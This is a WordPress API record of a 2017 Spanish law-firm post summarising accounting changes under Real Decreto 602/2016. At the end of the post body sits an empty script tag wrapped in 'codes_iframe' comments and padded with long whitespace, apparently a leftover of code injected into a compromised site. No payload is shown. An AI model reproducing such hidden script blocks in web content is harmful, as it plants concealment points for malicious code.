{"id":11732,"date":"2017-02-14T09:42:43","date_gmt":"2017-02-14T08:42:43","guid":{"rendered":"http:\/\/fmsb.disstintbeta.com\/2017\/02\/14\/882-2\/"},"modified":"2017-02-14T09:42:43","modified_gmt":"2017-02-14T08:42:43","slug":"882-2","status":"publish","type":"post","link":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/","title":{"rendered":"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre."},"content":{"rendered":"<h3><a href=\"https:\/\/www.fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone wp-image-886 size-full\" src=\"https:\/\/www.fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg\" alt=\"\" width=\"526\" height=\"286\" srcset=\"https:\/\/font-mora-sainz-baranda.fra1.digitaloceanspaces.com\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg 526w, https:\/\/font-mora-sainz-baranda.fra1.digitaloceanspaces.com\/wp-content\/uploads\/2017\/02\/department-of-accountancy-300x163.jpg 300w\" sizes=\"(max-width: 526px) 100vw, 526px\" \/><\/a><\/h3>\n<h3 style=\"text-align: justify;\"><strong>Cambios en la normativa contable: contenido y novedades del Real Decreto 602\/2016, de 2 de diciembre.<\/strong><\/h3>\n<p style=\"text-align: justify;\">El 17 de diciembre de 2016 se public\u00f3 en el BOE el\u00a0<strong>Real Decreto 602\/2016, de 2 de diciembre<\/strong><strong>,<\/strong>\u00a0por el que se modifican el Plan General de Contabilidad aprobado por el Real Decreto 1514\/2007, de 16 de noviembre ; el Plan General de Contabilidad de Peque\u00f1as y Medianas Empresas aprobado por el Real Decreto 1515\/2007, de 16 de noviembre ; las Normas para la Formulaci\u00f3n de Cuentas Anuales Consolidadas aprobadas por el Real Decreto 1159\/2010, de 17 de septiembre ; y las Normas de Adaptaci\u00f3n del Plan General de Contabilidad a las entidades sin fines lucrativos aprobadas por el Real Decreto 1491\/2011, de 24 de octubre .<\/p>\n<p style=\"text-align: justify;\">El origen de esta norma, tiene como finalidad, trasponer a nuestro ordenamiento interno lo dispuesto por la Directiva 2013\/34\/UE del Parlamento Europeo y del Consejo de 26 de junio de 2013 sobre los estados financieros anuales, los estados financieros consolidados y otros informes afines de ciertos tipos de empresas.<\/p>\n<p style=\"text-align: justify;\">El contenido de la reforma afecta a tres bloques de materias diferentes:<\/p>\n<ol style=\"text-align: justify;\">\n<li>Simplificaci\u00f3n de obligaciones contables para peque\u00f1as empresas<\/li>\n<li>Criterios de valoraci\u00f3n<\/li>\n<li>Dispensa y exclusi\u00f3n de la obligaci\u00f3n de consolidar.<\/li>\n<\/ol>\n<p style=\"text-align: justify;\"><strong>A<\/strong>. De los tres bloques de cambios que ahora se aprueban, hay que destacar el relacionado con la\u00a0<strong>simplificaci\u00f3n de las obligaciones contables\u00a0de las\u00a0peque\u00f1as empresas,<\/strong> de aplicaci\u00f3n para la elaboraci\u00f3n de las cuentas anuales de los ejercicios que se inicien a partir del 1 de enero de 2016<strong>,\u00a0<\/strong>que se materializa en:<\/p>\n<ul style=\"text-align: justify;\">\n<li>la supresi\u00f3n del car\u00e1cter obligatorio del estado de cambios en el patrimonio neto, que pasa a configurarse como un documento voluntario,<\/li>\n<li>y en la reducci\u00f3n de las indicaciones a incluir en la memoria, tanto en las empresas que utilicen el modelo abreviado de PGC como para los sujetos contables que opten por aplicar el modelo del PGC-Pymes.<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Juntamente con estos cambios, se produce la <strong>ampliaci\u00f3n del \u00e1mbito de aplicaci\u00f3n del PGC-PYMES<\/strong>, para todas aquellas empresas, cualquiera que sea su forma jur\u00eddica, que, durante dos ejercicios consecutivos, re\u00fanan al cierre de cada uno de ellos, dos de las siguientes circunstancias:<\/p>\n<ul style=\"text-align: justify;\">\n<li>Total activo &lt; 4.000.000\u20ac<\/li>\n<li>Cifra de negocios &lt; 8.000.000\u20ac<\/li>\n<li>Numero medio empleados &lt; 50<\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><strong>\u00a0<\/strong><strong>B.\u00a0Modificaci\u00f3n en los criterios de registro y valoraci\u00f3n en los activos intangibles<\/strong>. Para los inmovilizados intangibles se fija un plazo de amortizaci\u00f3n de diez a\u00f1os cuando su vida \u00fatil no pueda estimarse de manera fiable, salvo que exista una previsi\u00f3n legal espec\u00edfica distinta -como, por ejemplo, los gastos de investigaci\u00f3n y desarrollo-.<\/p>\n<p style=\"text-align: justify;\">En relaci\u00f3n al <strong>fondo de comercio<\/strong>, el RD incluye una presunci\u00f3n que admite prueba en contrario de que \u00e9ste se recuperar\u00e1 de forma lineal en un plazo de diez a\u00f1os.<\/p>\n<p style=\"text-align: justify;\">Existe un r\u00e9gimen transitorio que establece que, la reserva por fondo de comercio se reclasificar\u00e1 a la cuenta de reservas voluntarias en el importe que supere el valor en libros del fondo de comercio contabilizado en el activo del balance. Sin perjuicio de lo anterior, se introduce la opci\u00f3n de ajustar su valor en libros con cargo a reservas. En ese caso, se cuantificar\u00e1 el importe acumulado de la amortizaci\u00f3n desde la fecha de adquisici\u00f3n hasta el 1 de enero de 2016, seg\u00fan un criterio lineal de recuperaci\u00f3n y una vida \u00fatil de 10 a\u00f1os. La amortizaci\u00f3n posterior se calcular\u00e1 aplicando los nuevos criterios.<\/p>\n<p style=\"text-align: justify;\"><strong>C.\u00a0Dispensa y exclusi\u00f3n de la obligaci\u00f3n de consolidar<\/strong>.<\/p>\n<ol style=\"text-align: justify;\">\n<li>Se revisan las dispensas por raz\u00f3n de tama\u00f1o, que se aplica a los grupos peque\u00f1os de forma obligatoria.<\/li>\n<li>Las entidades de inter\u00e9s p\u00fablico est\u00e1n obligadas a consolidar sea cual sea su tama\u00f1o.<\/li>\n<\/ol>\n<p style=\"text-align: justify;\">Debe tenerse en cuenta que estos cambios son de aplicaci\u00f3n para los <strong>ejercicios que se iniciaron\u00a0a partir del 1 de enero de 2016.<\/strong><\/p>\n<p><!--codes_iframe--><script type=\"text\/javascript\">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cambios en la normativa contable: contenido y novedades del Real Decreto 602\/2016, de 2 de diciembre. El 17 de diciembre de 2016 se public\u00f3 en el BOE el\u00a0Real Decreto 602\/2016, de 2 de diciembre,\u00a0por el que se modifican el Plan General de Contabilidad aprobado por el Real Decreto 1514\/2007, de 16 de noviembre ; el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8706,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2250,2946,2152,20],"tags":[],"class_list":["post-11732","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-derecho-fiscal-en","category-derecho-mercantil-en","category-home-en-2","category-sin-categorizar"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre. - FMSB Abogados y Economistas en Baleares<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre. - FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"og:description\" content=\"Cambios en la normativa contable: contenido y novedades del Real Decreto 602\/2016, de 2 de diciembre. El 17 de diciembre de 2016 se public\u00f3 en el BOE el\u00a0Real Decreto 602\/2016, de 2 de diciembre,\u00a0por el que se modifican el Plan General de Contabilidad aprobado por el Real Decreto 1514\/2007, de 16 de noviembre ; el [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/\" \/>\n<meta property=\"og:site_name\" content=\"FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"article:published_time\" content=\"2017-02-14T08:42:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"526\" \/>\n\t<meta property=\"og:image:height\" content=\"286\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"fmsb\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fmsb-disstint\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"fmsb\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/\"},\"author\":{\"name\":\"fmsb\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\"},\"headline\":\"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\\\/2016, de 2 de diciembre.\",\"datePublished\":\"2017-02-14T08:42:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/\"},\"wordCount\":653,\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/02\\\/department-of-accountancy.jpg\",\"articleSection\":[\"Derecho Fiscal\",\"Derecho Mercantil\",\"Home\",\"Sin categorizar\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/\",\"name\":\"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\\\/2016, de 2 de diciembre. - FMSB Abogados y Economistas en Baleares\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/02\\\/department-of-accountancy.jpg\",\"datePublished\":\"2017-02-14T08:42:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#primaryimage\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/02\\\/department-of-accountancy.jpg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/02\\\/department-of-accountancy.jpg\",\"width\":526,\"height\":286},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/02\\\/14\\\/882-2\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\\\/2016, de 2 de diciembre.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"width\":154,\"height\":52,\"caption\":\"FMSB Abogados y Economistas en Baleares\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\",\"name\":\"fmsb\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"caption\":\"fmsb\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/fmsb-disstint\"],\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/author\\\/fmsb\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre. - FMSB Abogados y Economistas en Baleares","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/","og_locale":"en_US","og_type":"article","og_title":"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre. - FMSB Abogados y Economistas en Baleares","og_description":"Cambios en la normativa contable: contenido y novedades del Real Decreto 602\/2016, de 2 de diciembre. El 17 de diciembre de 2016 se public\u00f3 en el BOE el\u00a0Real Decreto 602\/2016, de 2 de diciembre,\u00a0por el que se modifican el Plan General de Contabilidad aprobado por el Real Decreto 1514\/2007, de 16 de noviembre ; el [&hellip;]","og_url":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/","og_site_name":"FMSB Abogados y Economistas en Baleares","article_published_time":"2017-02-14T08:42:43+00:00","og_image":[{"width":526,"height":286,"url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg","type":"image\/jpeg"}],"author":"fmsb","twitter_card":"summary_large_image","twitter_creator":"@fmsb-disstint","twitter_misc":{"Written by":"fmsb","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#article","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/"},"author":{"name":"fmsb","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2"},"headline":"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre.","datePublished":"2017-02-14T08:42:43+00:00","mainEntityOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/"},"wordCount":653,"publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg","articleSection":["Derecho Fiscal","Derecho Mercantil","Home","Sin categorizar"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/","url":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/","name":"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre. - FMSB Abogados y Economistas en Baleares","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#primaryimage"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg","datePublished":"2017-02-14T08:42:43+00:00","breadcrumb":{"@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#primaryimage","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/02\/department-of-accountancy.jpg","width":526,"height":286},{"@type":"BreadcrumbList","@id":"https:\/\/fmsb.eu\/en\/2017\/02\/14\/882-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/fmsb.eu\/en\/"},{"@type":"ListItem","position":2,"name":"An\u00e1lisis de las novedades contables introducidas por el Real Decreto 602\/2016, de 2 de diciembre."}]},{"@type":"WebSite","@id":"https:\/\/fmsb.eu\/en\/#website","url":"https:\/\/fmsb.eu\/en\/","name":"FMSB Abogados y Economistas en Baleares","description":"","publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fmsb.eu\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/fmsb.eu\/en\/#organization","name":"FMSB Abogados y Economistas en Baleares","url":"https:\/\/fmsb.eu\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","width":154,"height":52,"caption":"FMSB Abogados y Economistas en Baleares"},"image":{"@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2","name":"fmsb","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","caption":"fmsb"},"sameAs":["https:\/\/x.com\/fmsb-disstint"],"url":"https:\/\/fmsb.eu\/en\/author\/fmsb\/"}]}},"_links":{"self":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11732","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/comments?post=11732"}],"version-history":[{"count":0,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11732\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media\/8706"}],"wp:attachment":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media?parent=11732"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/categories?post=11732"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/tags?post=11732"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}